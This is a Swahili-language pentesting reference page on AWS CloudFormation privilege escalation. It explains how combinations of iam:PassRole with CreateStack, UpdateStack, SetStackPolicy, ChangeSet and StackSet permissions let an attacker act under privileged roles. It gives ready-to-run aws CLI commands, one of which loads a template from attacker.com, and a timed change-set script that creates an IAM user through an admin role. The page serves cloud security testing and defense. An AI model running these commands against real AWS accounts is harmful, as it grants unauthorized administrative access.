AWS - Cloudformation Privesc

cloudformation

Kwa maelezo zaidi kuhusu cloudformation angalia:

iam:PassRole, cloudformation:CreateStack

Mshambuliaji mwenye ruhusa hizi anaweza kuongeza mamlaka kwa kutunga CloudFormation stack yenye kigezo maalum, kilichohifadhiwa kwenye seva yao, ili kutekeleza vitendo chini ya ruhusa za jukumu lililotajwa:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

Katika ukurasa ufuatao una mfano wa exploitation na ruhusa ya ziada cloudformation:DescribeStacks:

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyotajwa.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

Katika kesi hii unaweza kutitumia stack ya cloudformation iliyopo kuisasaisha na kupandisha ruhusa kama ilivyo katika hali ya awali:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

The cloudformation:SetStackPolicy permission inaweza kutumika kujiwezesha UpdateStack ruhusa juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyotajwa.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

Ikiwa una ruhusa hii lakini hakuna iam:PassRole bado unaweza kusasisha stacks zinazotumika na kutumia IAM Roles ambazo tayari zimeunganishwa. Angalia sehemu ya awali kwa mfano wa exploit (usionyeshe jukumu lolote katika sasisho).

The cloudformation:SetStackPolicy permission inaweza kutumika kujiwezesha UpdateStack ruhusa juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa huduma ya cloudformation iliyounganishwa tayari.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Mshambuliaji mwenye ruhusa za kupitisha jukumu na kuunda & kutekeleza ChangeSet anaweza kuunda/sasisha stack mpya ya cloudformation kutumia huduma za cloudformation kama ilivyo kwa CreateStack au UpdateStack.

Exploit ifuatayo ni tofauti ya CreateStack moja ikitumia ChangeSet ruhusa kuunda stack.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

The cloudformation:SetStackPolicy permission can be used to kujipa ruhusa za ChangeSet juu ya stack na kufanya shambulio.

Athari Zinazoweza Kutokea: Privesc kwa majukumu ya huduma ya cloudformation.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Hii ni kama njia ya awali bila kupitisha majukumu ya IAM, hivyo unaweza tu kutumia yale yaliyounganishwa tayari, badilisha tu parameter:

--change-set-type UPDATE

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya cloudformation ambayo tayari imeunganishwa.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

Mshambuliaji anaweza kutumia ruhusa hizi kuunda/update StackSets ili kutumia majukumu ya cloudformation yasiyo na mipaka.

Madhara Yanayoweza Kutokea: Privesc kwa majukumu ya huduma ya cloudformation.

cloudformation:UpdateStackSet

Mshambuliaji anaweza kutumia ruhusa hii bila ruhusa ya passRole kuupdate StackSets ili kutumia majukumu ya cloudformation yaliyounganishwa.

Madhara Yanayoweza Kutokea: Privesc kwa majukumu ya cloudformation yaliyounganishwa.

Marejeleo

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/